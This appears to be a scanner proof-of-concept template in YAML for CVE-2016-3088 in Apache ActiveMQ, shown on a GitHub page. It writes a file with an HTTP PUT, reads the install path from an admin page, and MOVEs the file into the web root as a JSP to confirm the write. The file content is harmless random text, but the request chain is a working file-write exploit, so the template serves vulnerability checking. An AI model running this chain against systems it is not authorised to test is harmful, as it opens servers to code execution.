-
Notifications
You must be signed in to change notification settings - Fork 220
/
CVE-2016-3088.yml
46 lines (46 loc) · 1.37 KB
/
CVE-2016-3088.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
name: poc-yaml-activemq-cve-2016-3088
manual: true
transport: http
set:
filename: randomLowercase(6)
fileContent: randomLowercase(6)
rules:
r0:
request:
cache: true
method: PUT
path: /fileserver/{{filename}}.txt
body: |
{{fileContent}}
expression: response.status == 204
r1:
request:
cache: true
method: GET
path: /admin/test/index.jsp
follow_redirects: false
expression: response.status == 200
output:
search: '"activemq.home=(?P<home>.*?),".bsubmatch(response.body)'
home: search["home"]
r2:
request:
cache: true
method: MOVE
path: /fileserver/{{filename}}.txt
headers:
Destination: file://{{home}}/webapps/api/{{filename}}.jsp
follow_redirects: false
expression: response.status == 204
r3:
request:
cache: true
method: GET
path: /api/{{filename}}.jsp
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(fileContent))
expression: r0() && r1() && r2() && r3()
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088